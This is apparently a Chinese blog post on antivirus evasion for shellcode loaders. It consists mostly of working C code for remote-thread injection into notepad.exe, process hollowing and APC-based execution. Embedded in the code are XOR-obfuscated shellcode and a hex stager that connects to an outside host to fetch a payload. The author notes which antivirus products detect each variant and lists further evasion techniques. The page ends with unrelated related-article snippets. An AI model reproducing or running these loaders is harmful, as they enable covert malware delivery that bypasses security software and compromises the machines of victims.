x64\x26\x69\x7c\x7\x98\x54\x67\xf3\xae\x39\xff\x43\xa0\xf0\x21\x44\xec\x46\xa\xb0\x4f\xc6\x36\xef\x63\x1a\xa9\xc8\xbb\x80\x2\x51\x59\x6\x77\xda\x7e\x51\xed\xdb\xb2\x68\x5f\xdc\xef\x68\xaa\x2a\x3f\xad\x96\x86\xb5\xce\x93\xff\x60\x2a\x19\x59\x49\x7f\xe8\x59\xb\x7\x49\x36\x7e\x42\x3\x46\x90\xcf\xc6\x9\x3f\xb4\xd2\x9d\x1\x73\x61\x74\x4e\xbb\x27\xec\x15\xd4\xf8\x32\x8f\xaf\x9d\xfd\xfa\x18\xde\xf9\x9b\xbc\x3d\xeb\x9\xd3\x31\xae\x4a\x71\x74\xba\x29\x94\xf2\x10\xca\x9f\x46\x97\x4b\xe5\xf1\x60\xd3\xf\xef\x65\x83\xa1\x32\x4b\x88\x4b\xc1\x46\x6f\x6d\x3c\x9a\xc\x8f\x13\xef\x10\x91\x18\xb7\xb6\x8c\xb5\x5e\x7e\xf7\x5b\xda\x8d\x2f\x68\x12\x70\xea\x62\xd2\xfb\x5a\xa2\x7a\x3c\xa7\xe1\xc4\x80\xba\xcb\x2d\x58\xf6\xe5\x11\x20\xd9\xa5\xc0\xe2\x50\x56\xa3\x75\x43\x96\x44\xb4\xf0\x3d\xd4\xce\x7c\x40\x21\x40\x6e\x30\xb7\x95\x27\x4a\x5\x88\x55\x1e\x8c\x5f\xd8\xb1\xa2\x4f\x87\x75\x32\x73\x8c\xc2\x87\x90\x64\xcd\xe7\x7a\x3\xfb\x88\x32\x32\x72\x32\x73\x8a\x32\x22\x32\x32\x73\x8b\x72\x32\x32\x32\x73\x88\x6a\x96\x61\xd7\xcd\xe7\x7a\xa1\x61\x61\x7a\xbb\xd5\x7a\xbb\xc3\x7a\xbb\xe8\x73\x8a\x32\x12\x32\x32\x7b\xbb\xcb\x73\x88\x20\xa4\xbb\xd0\xcd\xe7\x7a\xb1\xf6\x12\xb7\xf2\x46\x84\x54\xb9\x35\x7a\x33\xf1\xb7\xf2\x47\xe5\x6a\x6a\x6a\x7a\x37\x32\x32\x32\x32\x62\xf1\xda\xad\xcf\xcd\xcd\x3\xb\x0\x1c\x3\x4\xa\x1c\x3\x7\x1c\x3\x1\x32\x5d\x98\x63\xf1";

INT FoundPid(const wchar_t* szName) {
	// 设置变量
	PROCESSENTRY32 pe = { 0 };
	HANDLE hSnapShot = NULL;
	int pid = 0;
	// 初始化大小
	pe.dwSize = sizeof(PROCESSENTRY32);
	// 创建进程快照
	hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	if (hSnapShot != INVALID_HANDLE_VALUE) {
		// 获取快照
		BOOL Process = Process32First(hSnapShot, &pe);
		if (!Process) {
			return -1;
		}
		// 遍历快照
		while (Process32Next(hSnapShot, &pe)) {
			// 判断进程名是否相同
			if (!_wcsicmp(szName, pe.szExeFile)) {
				pid = pe.th32ProcessID;
				printf("[+] 找到指定进程pid: %d\n", pe.th32ProcessID);
				break;
			}
		}
		CloseHandle(hSnapShot);
		return pid;
	}
	else {
		printf("[-] 进程快照创建失败!\t错误值: %d\n", GetLastError());
		return -1;
	}
}

void InjectShellCode(const wchar_t* szName)
{
	HANDLE Handle, remoteThread;
	PVOID remoteBuffer;
	int Pid = FoundPid(szName);
	Handle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, Pid);
	// 还原异或
	for (int i = 0; i < sizeof(buf); i++) {
		buf[i] ^= 50;
	}
	remoteBuffer = VirtualAllocEx(Handle, NULL, sizeof(buf), (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
	WriteProcessMemory(Handle, remoteBuffer, buf, sizeof(buf), NULL);
	remoteThread = CreateRemoteThread(Handle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
	CloseHandle(Handle);
}


int main(int argc, char *argv[])
{
	InjectShellCode(L"notepad.exe");
	return 0;
}

火绒杀了 360没杀,再异或一个66也是一样,火绒杀了但是360不杀

傀儡进程

这个用c编译

#include <Windows.h>
#include <stdio.h>

unsigned char buf[] = "\xce\x7a\xb1\xd6\xc2\xda\xfa\x32\x32\x32\x73\x63\x73\x62\x60\x63\x64\x7a\x3\xe0\x57\x7a\xb9\x60\x52\x7a\xb9\x60\x2a\x7a\xb9\x60\x12\x7a\xb9\x40\x62\x7a\x3d\x85\x78\x78\x7f\x3\xfb\x7a\x3\xf2\x9e\xe\x53\x4e\x30\x1e\x12\x73\xf3\xfb\x3f\x73\x33\xf3\xd0\xdf\x60\x73\x63\x7a\xb9\x60\x12\xb9\x70\xe\x7a\x33\xe2\x54\xb3\x4a\x2a\x39\x30\x47\x40\xb9\xb2\xba\x32\x32\x32\x7a\xb7\xf2\x46\x55\x7a\x33\xe2\x62\xb9\x7a\x2a\x76\xb9\x72\x12\x7b\x33\xe2\xd1\x64\x7a\xcd\xfb\x73\xb9\x6\xba\x7a\x33\xe4\x7f\x3\xfb\x7a\x3\xf2\x9e\x73\xf3\xfb\x3f\x73\x33\xf3\xa\xd2\x47\xc3\x7e\x31\x7e\x16\x3a\x77\xb\xe3\x47\xea\x6a\x76\xb9\x72\x16\x7b\x33\xe2\x54\x73\xb9\x3e\x7a\x76\xb9\x72\x2e\x7b\x33\xe2\x73\xb9\x36\xba\x7a\x33\xe2\x73\x6a\x73\x6a\x6c\x6b\x68\x73\x6a\x73\x6b\x73\x68\x7a\xb1\xde\x12\x73\x60\xcd\xd2\x6a\x73\x6b\x68\x7a\xb9\x20\xdb\x7d\xcd\xcd\xcd\x6f\x58\x32\x7b\x8c\x45\x5b\x5c\x5b\x5c\x57\x46\x32\x73\x64\x7b\xbb\xd4\x7e\xbb\xc3\x73\x88\x7e\x45\x14\x35\xcd\xe7\x7a\x3\xfb\x7a\x3\xe0\x7f\x3\xf2\x7f\x3\xfb\x73\x62\x73\x62\x73\x88\x8\x64\x4b\x95\xcd\xe7\xd9\x41\x68\x7a\xbb\xf3\x73\x8a\x38\x28\x32\x32\x7f\x3\xfb\x73\x63\x73\x63\x58\x31\x73\x63\x73\x88\x65\xbb\xad\xf4\xcd\xe7\xd9\x6b\x69\x7a\xbb\xf3\x7a\x3\xe0\x7b\xbb\xea\x7f\x3\xfb\x60\x5a\x32\x30\x72\xb6\x60\x60\x73\x88\xd9\x67\x1c\x9\xcd\xe7\x7a\xbb\xf4\x7a\xb1\xf1\x62\x58\x38\x6d\x7a\xbb\xc3\x7a\xbb\xe8\x7b\xf5\xf2\xcd\xcd\xcd\xcd\x7f\x3\xfb\x60\x60\x73\x88\x1f\x34\x2a\x49\xcd\xe7\xb7\xf2\x3d\xb7\xaf\x33\x32\x32\x7a\xcd\xfd\x3d\xb6\xbe\x33\x32\x32\xd9\xe1\xdb\xd6\x33\x32\x32\xda\x90\xcd\xcd\xcd\x1d\x5d\x75\x41\x6\x32\x3\x49\x0\x7b\x7d\x54\xaf\x92\xa1\xa2\xb1\x75\x96\x96\xd7\x7d\xfe\xbb\xa7\xeb\x12\xaa\x6b\x5d\xf6\xef\x54\x25\x6a\x7a\x52\x7c\x91\x63\x5a\x49\x7f\x32\x76\x52\x45\x61\xdf\xea\xd3\xf8\xb8\x60\x6f\xd3\x5a\x4c\x7c\x4b\xe5\xb2\x50\x3b\xff\x65\xb4\xff\x6d\x6e\x5b\x8f\x34\xc3\x7b\x6e\xfa\xf\x8c\x32\x67\x41\x57\x40\x1f\x73\x55\x57\x5c\x46\x8\x12\x7f\x5d\x48\x5b\x5e\x5e\x53\x1d\x7\x1c\x2\x12\x1a\x51\x5d\x5f\x42\x53\x46\x5b\x50\x5e\x57\x9\x12\x7f\x61\x7b\x77\x12\x3\x2\x1c\x2\x9\x12\x65\x5b\x5c\x56\x5d\x45\x41\x12\x7c\x66\x12\x4\x1c\x0\x9\x12\x66\x40\x5b\x56\x57\x5c\x46\x1d\x4\x1c\x2\x1b\x3f\x38\x32\xaa\x3e\x76\x21\x64\x26\x69\x7c\x7\x98\x54\x67\xf3\xae\x39\xff\x43\xa0\xf0\x21\x44\xec\x46\xa\xb0\x4f\xc6\x36\xef\x63\x1a\xa9\xc8\xbb\x80\x2\x51\x59\x6\x77\xda\x7e\x51\xed\xdb\xb2\x68\x5f\xdc\xef\x68\xaa\x2a\x3f\xad\x96\x86\xb5\xce\x93\xff\x60\x2a\x19\x59\x49\x7f\xe8\x59\xb\x7\x49\x36\x7e\x42\x3\x46\x90\xcf\xc6\x9\x3f\xb4\xd2\x9d\x1\x73\x61\x74\x4e\xbb\x27\xec\x15\xd4\xf8\x32\x8f\xaf\x9d\xfd\xfa\x18\xde\xf9\x9b\xbc\x3d\xeb\x9\xd3\x31\xae\x4a\x71\x74\xba\x29\x94\xf2\x10\xca\x9f\x46\x97\x4b\xe5\xf1\x60\xd3\xf\xef\x65\x83\xa1\x32\x4b\x88\x4b\xc1\x46\x6f\x6d\x3c\x9a\xc\x8f\x13\xef\x10\x91\x18\xb7\xb6\x8c\xb5\x5e\x7e\xf7\x5b\xda\x8d\x2f\x68\x12\x70\xea\x62\xd2\xfb\x5a\xa2\x7a\x3c\xa7\xe1\xc4\x80\xba\xcb\x2d\x58\xf6\xe5\x11\x20\xd9\xa5\xc0\xe2\x50\x56\xa3\x75\x43\x96\x44\xb4\xf0\x3d\xd4\xce\x7c\x40\x21\x40\x6e\x30\xb7\x95\x27\x4a\x5\x88\x55\x1e\x8c\x5f\xd8\xb1\xa2\x4f\x87\x75\x32\x73\x8c\xc2\x87\x90\x64\xcd\xe7\x7a\x3\xfb\x88\x32\x32\x72\x32\x73\x8a\x32\x22\x32\x32\x73\x8b\x72\x32\x32\x32\x73\x88\x6a\x96\x61\xd7\xcd\xe7\x7a\xa1\x61\x61\x7a\xbb\xd5\x7a\xbb\xc3\x7a\xbb\xe8\x73\x8a\x32\x12\x32\x32\x7b\xbb\xcb\x73\x88\x20\xa4\xbb\xd0\xcd\xe7\x7a\xb1\xf6\x12\xb7\xf2\x46\x84\x54\xb9\x35\x7a\x33\xf1\xb7\xf2\x47\xe5\x6a\x6a\x6a\x7a\x37\x32\x32\x32\x32\x62\xf1\xda\xad\xcf\xcd\xcd\x3\xb\x0\x1c\x3\x4\xa\x1c\x3\x7\x1c\x3\x1\x32\x5d\x98\x63\xf1";

BOOL ReplaceProcess(const char *pszFilePath)
{
	STARTUPINFO si = { 0 };
	PROCESS_INFORMATION pi = { 0 };
	CONTEXT threadContext = { 0 };
	BOOL bRet = FALSE;
	RtlZeroMemory(&si, sizeof(si));
	RtlZeroMemory(&pi, sizeof(pi));
	RtlZeroMemory(&threadContext, sizeof(threadContext));
	si.cb = sizeof(si);
	// 创建进程并挂起主线程
	bRet = CreateProcessA(pszFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);
	if (FALSE == bRet)
	{
		printf("CreateProcess");
		return FALSE;
	}
	// 在替换的进程中申请一块内存
	LPVOID lpDestBaseAddr = VirtualAllocEx(pi.hProcess, NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	if (NULL == lpDestBaseAddr)
	{
		printf("VirtualAllocEx");
		return FALSE;
	}
	// 还原异或
	for (int i = 0; i < sizeof(buf); i++) {
		buf[i] ^= 50;
	}
	// 写入替换的数据
	bRet = WriteProcessMemory(pi.hProcess, lpDestBaseAddr, buf, sizeof(buf), NULL);
	if (FALSE == bRet)
	{
		printf("WriteProcessError");
		return FALSE;
	}
	// 获取线程上下文
	// 注意此处标志,一定要写!!!
	threadContext.ContextFlags = CONTEXT_FULL;
	bRet = GetThreadContext(pi.hThread, &threadContext);
	if (FALSE == bRet)
	{
		printf("GetThreadContext");
		return FALSE;
	}
	// 修改eip从新申请的内存处运行
	threadContext.Rip = (DWORD64)lpDestBaseAddr;
	// 设置挂起进程的线程上下文
	bRet = SetThreadContext(pi.hThread, &threadContext);
	if (FALSE == bRet)
	{
		printf("SetThreadContext");
		return FALSE;
	}
	// 恢复挂起的进程的线程
	ResumeThread(pi.hThread);
	WaitForSingleObject(pi.hThread, INFINITE);
	CloseHandle(pi.hThread);
	CloseHandle(pi.hProcess);
	return TRUE;
}



void main() {
	
	ReplaceProcess("C:\\Windows\\System32\\notepad.exe");

}

5.未导出api bypass

#include <Windows.h>
#include <stdio.h>
#pragma comment(lib, "ntdll")
using myNtTestAlert = NTSTATUS(NTAPI*)();

int main()
{
	char buf[] = "fce8890000006089e531d2648b52308b520c8b52148b72280fb74a2631ff31c0ac3c617c022c20c1cf0d01c7e2f052578b52108b423c01d08b407885c0744a01d0508b48188b582001d3e33c498b348b01d631ff31c0acc1cf0d01c738e075f4037df83b7d2475e2588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe0585f5a8b12eb865d686e6574006877696e6954684c772607ffd5e80000000031ff5757575757683a5679a7ffd5e9a40000005b31c951516a03515168fb20000053506857899fc6ffd550e98c0000005b31d252680032c08452525253525068eb552e3bffd589c683c350688033000089e06a04506a1f566875469e86ffd55f31ff57576aff5356682d06187bffd585c00f84ca01000031ff85f6740489f9eb0968aac5e25dffd589c16845215e31ffd531ff576a0751565068b757e00bffd5bf002f000039c775075850e97bffffff31ffe991010000e9c9010000e86fffffff2f5877424b00c638b6057378a894eecf7bc1aa53ba78900a3bb158655591a5330461ce3d74a0e14842e13a75861c930427a411f354079ef04a095ad081b8e47fe04ded2f08e0fc010136d933a1807300557365722d4167656e743a204d6f7a696c6c612f352e30202857696e646f7773204e5420362e313b20574f5736343b2054726964656e742f372e303b2072763a31312e3029206c696b65204765636b6f0d0a486f73743a2075732e776f726c646973656e646d61696c2e6d6c0d0a007fef054e2008ae77070f044f1087a24772a18e66fbc21da7ae0deb5058231549208008c5c1d40c32c9f88b3e85652e58a3ca12e34ad665175870d1fc6d165493374260b2c750510707a5328dbaf92eab4f0b92fa87e05815da018b2c9a4a322ff33122f6bb9634cb1790d825298529cb30e5f01f7e6cdfba37bd78b967e41a7ece26d438f78459445dbdd9e7b1c7e0adf81b0c58a4d3ecf83e57191cbeb494683b9b25b3dd9bb903b1421b77de08b283b4e28820e49b04b8b303f85c4d1495900068f0b5a256ffd56a4068001000006800004000576858a453e5ffd593b90000000001d9515389e7576800200000535668129689e2ffd585c074c68b0701c385c075e558c3e889fdffff75732e776f726c646973656e646d61696c2e6d6c00499602d2";
	myNtTestAlert testAlert = (myNtTestAlert)(GetProcAddress(GetModuleHandleA("ntdll"), "NtTestAlert"));


	unsigned int char_in_hex;

	unsigned int iterations = strlen(buf);
	
	unsigned int memory_allocation = strlen(buf) / 2;
	//由于字符串编译后默认写入不可写的PE段,所以需要修改内存属性

	for (unsigned int i = 0; i < iterations / 2; i++) { //减小开销
		sscanf_s(buf + 2 * i, "%2X", &char_in_hex);
		buf[i] = (char)char_in_hex;
	}
	
	LPVOID shellAddress = VirtualAlloc(NULL, memory_allocation, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

	WriteProcessMemory(GetCurrentProcess(), shellAddress, buf, memory_allocation, NULL);

	PTHREAD_START_ROUTINE apcRoutine = (PTHREAD_START_ROUTINE)shellAddress;
	QueueUserAPC((PAPCFUNC)apcRoutine, GetCurrentThread(), NULL);//插入APC到当前线程
	testAlert();//APC队列不为空马上运行

	return 0;
}

这个火绒和360都不杀

6.掩日(进程注入工具)

其他的

简单的:特征去除、加壳、编码加密、分离免杀、图片混淆

比较难的:HTML 挟带、反射注入、dll空心化、进程空心化、父进程欺骗

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/529015.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

《编码——隐匿在计算机软硬件背后的语言》精炼——第17章(自动操作)

夫道成于学而藏于书&#xff0c;学进于振而废于穷。 文章目录 完善加法器加入代码的加法器扩大加数范围自由调用地址的加法器合并代码RAM和数据RAMJump指令硬件实现条件Jump指令零转移的硬件实现条件Jump指令的例子 总结 完善加法器 我们在第14章介绍了一个可以进行连加的加法…

在线域名批量查询工具-未注册域名批量查询软件

在线域名批量查询工具 在线域名批量查询工具是一种通过互联网进行批量查询域名相关信息和指标的工具。以下是其主要特点&#xff1a; 在线查询&#xff1a;在线域名批量查询工具可以直接在浏览器中进行查询&#xff0c;无需下载和安装任何软件。 批量查询&#xff1a;该工具…

内网渗透--frp代理设置与proxychains代理设置

标题内网渗透–frp代理设置与proxychains代理设置 内网服务器内网IP地址外网IP地址内网web服务器&#xff08;windows 7&#xff09;192.168.52.143192.168.213.138内网域控服务器192.168.52.138 外网服务器外网IP地址外网V8网卡外网kali192.168.213.132外网windows攻击机192…

开通小程序账号

文章目录 一、开通小程序账号1.1 登录微信公众平台注册小程序管理员账号1.2 激活邮箱1.3 信息登记 二、获取开发设置2.1 获取APP ID2.2 获取AppSecret 一、开通小程序账号 微信小程序已经成为移动应用开发的热门平台之一,许多开发者都想要开发自己的小程序。但是首先我们需要注…

Pandas中的逻辑运算符(与或非)及Python代码示例

Pandas是Python中一个非常流行的用于数据处理和分析的库&#xff0c;它提供了大量的函数和操作符&#xff0c;以便用户可以方便地对数据进行操纵。其中逻辑运算符是在Pandas中经常使用的一些操作符之一&#xff0c;因为它们使我们可以对数据进行逻辑上的比较和筛选。本篇博客将…

【Dart】=> [01] Dart基础-下载安装环境配置

目录 windows下载安装地址1. 下载dart-sdk并且解压到某盘符目录下2. 找到bin目录&#xff0c;复制bin目录完整路径3. 打开我的电脑&#xff0c;右键菜单&#xff0c;点击属性4. 找到高级系统设置&#xff0c;点击5. 点击环境变量![在这里插入图片描述](https://img-blog.csdnim…

串口监控的几种方式

目录 方法1. 使用usb转TTL模块硬件监控&#xff1b; 方法2. 使用JLINK的SWD接口的串口收发脚进行硬件监控&#xff1b; 方法3. 使用虚拟串口进行软件监控&#xff1b; 方法1. 使用usb转TTL模块硬件监控&#xff1b; 方法2. 使用JLINK的SWD接口的串口收发脚进行硬件监控&…

第十二章 使用Bind提供域名解析服务

文章目录 第十二章 使用Bind提供域名解析服务一、DNS域名解析服务1、DNS简介2、服务器类型3、13台根DNS服务器的具体信息 二、安装Bind服务程序1、Bind简介2、Bind安装3、关键配置文件4、修改主配置文件5、正向解析实验&#xff08;1&#xff09;、编辑区域配置文件&#xff08…

必须了解的内存屏障

目录 一&#xff0c;内存屏障1&#xff0c;概念2&#xff0c;内存屏障的效果3&#xff0c;cpu中的内存屏障 二&#xff0c;JVM中提供的四类内存屏障指令三&#xff0c;volatile 特性1&#xff0c;保证内存可见性定义2&#xff0c;禁止指令重排序3&#xff0c;不保证原子性 一&a…

Http与Https 比较

目录 1、HTTP&#xff08;HyperText Transfer Protocol&#xff1a;超文本传输协议&#xff09; 2、HTTPS&#xff08;Hypertext Transfer Protocol Secure&#xff1a;超文本传输安全协议&#xff09; 3、HTTP 与 HTTPS 区别 4、HTTPS 的工作原理 1、HTTP&#xff08;HyperTex…

MySQL---存储过程(局部变量、用户变量、系统变量(全局变量、会话变量)、传参(in、out、inout))

1. 存储过程特性 存储过程就是数据库 SQL 语言层面的代码封装与重用。 有输入输出参数&#xff0c;可以声明变量&#xff0c;有if/else, case,while等控制语句&#xff0c;通过编写存储过程&#xff0c;可以实现 复杂的逻辑功能&#xff1b; 函数的普遍特性&#xff1a;模块…

全球特种无人机市场规模逐渐扩大,预计今年将突破120亿美元

翱翔于空中是人们长久的追求&#xff0c;1903年&#xff0c;莱特兄弟发明了第一家螺旋桨飞机&#xff0c;这次飞行标志着飞机时代的开始。科技发展到今天&#xff0c;无人机&#xff08;英文简称为“UAV”&#xff09;作为一种高科技产品已经逐渐走进人们的生活中。 无人机技术…

如何解决浏览器跨域问题?

浏览器判断是跨域请求会在请求头上添加origin&#xff0c;表示这个请求来源哪里。比如&#xff1a; Plaintext GET / HTTP/1.1 Origin: http://localhost:8601服务器收到请求判断这个Origin是否允许跨域&#xff0c;如果允许则在响应头中说明允许该来源的跨域请求&#xff0c;…

【windows批处理batch】批处理batch字符串处理相关操作(字符串定义、分割、拼接、替换、切片、查找)

&#x1f449;博__主&#x1f448;&#xff1a;米码收割机 &#x1f449;技__能&#x1f448;&#xff1a;C/Python语言 &#x1f449;公众号&#x1f448;&#xff1a;测试开发自动化 &#x1f449;专__注&#x1f448;&#xff1a;专注主流机器人、人工智能等相关领域的开发、…

从万和电气看民企如何获得“新增长”

改革开放至今&#xff0c;中国民营企业在经过蒙眼狂奔的三十多年后&#xff0c;普遍迎来发展难题&#xff1a; 1&#xff0c;第一代创业者普遍进入退休年龄&#xff0c;面临代际传承问题&#xff1b; 2&#xff0c;民营企业尤其是偏传统行业的企业&#xff0c;如何在新的行业…

基于SSM的高校图书借阅管理系统

末尾获取源码 开发语言&#xff1a;Java Java开发工具&#xff1a;JDK1.8 后端框架&#xff1a;SSM 前端&#xff1a;采用JSP技术开发 数据库&#xff1a;MySQL5.7和Navicat管理工具结合 服务器&#xff1a;Tomcat8.5 开发软件&#xff1a;IDEA / Eclipse 是否Maven项目&#x…

mybatis-plus基本使用流程以及进阶操作

参考 https://www.bilibili.com/video/BV1dQ4y1A75e?p7&vd_source6346698154746eb5026e16499e253fe8 使用流程 一、 准备工作 3.引入依赖 4.插件 spring-boot-starter spring-boot-starter-test mybatis-plus-boot-starter MySQL lombok&#xff1a;用于简化实体类的创建…

查看 PostgreSQL 中的表定义和说明

要查看 PostgreSQL 中的表定义和说明&#xff0c;您可以使用以下命令&#xff1a; 1. 查看表定义&#xff1a; \d <table_name>例如&#xff0c;要查看 pg_extension 表的定义&#xff0c;您可以运行以下命令&#xff1a; \d pg_extension2. 查看表说明&#xff1a; …

山东移动:全业务域核心系统升级,实现大幅降本增效

本文介绍了山东移动引入 OceanBase 到山东省 BOSS/CRM 核心系统领域的相关情况。欢迎访问 OceanBase 官网获取更多信息&#xff1a;https://www.oceanbase.com/ 中国移动通信集团山东有限公司&#xff08;以下简称"山东移动"&#xff09; 隶属于中国移动通信集团公司…

【刷题之路】LeetCode 232. 用栈实现队列

【刷题之路】LeetCode 232. 用栈实现队列 一、题目描述二、解题1、图解主要思路2、先实现栈3、实现各个接口3.1、初始化接口3.2、入队接口3.3、出队接口3.4、取队头接口3.5、判空接口3.6、释放接口 一、题目描述 原题连接&#xff1a; 232. 用栈实现队列 题目描述&#xff1a;…